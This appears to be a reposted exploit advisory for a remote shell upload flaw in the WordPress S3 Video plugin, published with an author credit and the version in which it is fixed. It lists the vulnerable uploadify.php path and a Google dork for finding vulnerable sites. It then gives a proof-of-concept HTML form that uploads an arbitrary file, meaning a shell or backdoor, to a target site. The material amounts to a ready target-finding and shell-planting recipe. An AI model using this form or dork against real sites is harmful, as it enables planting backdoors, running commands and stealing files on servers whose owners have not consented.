#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Vulrnerability :
/wp-content/plugins/s3-video/includes/uploadify.phpDescription :
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.
Solution:
Upgrade new version of patch
-- Proof Of Concept --
You can use remote (xampp) , but i'd do simple way.. i will use csrf method.
Code :
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>
Tidak ada komentar:
Posting Komentar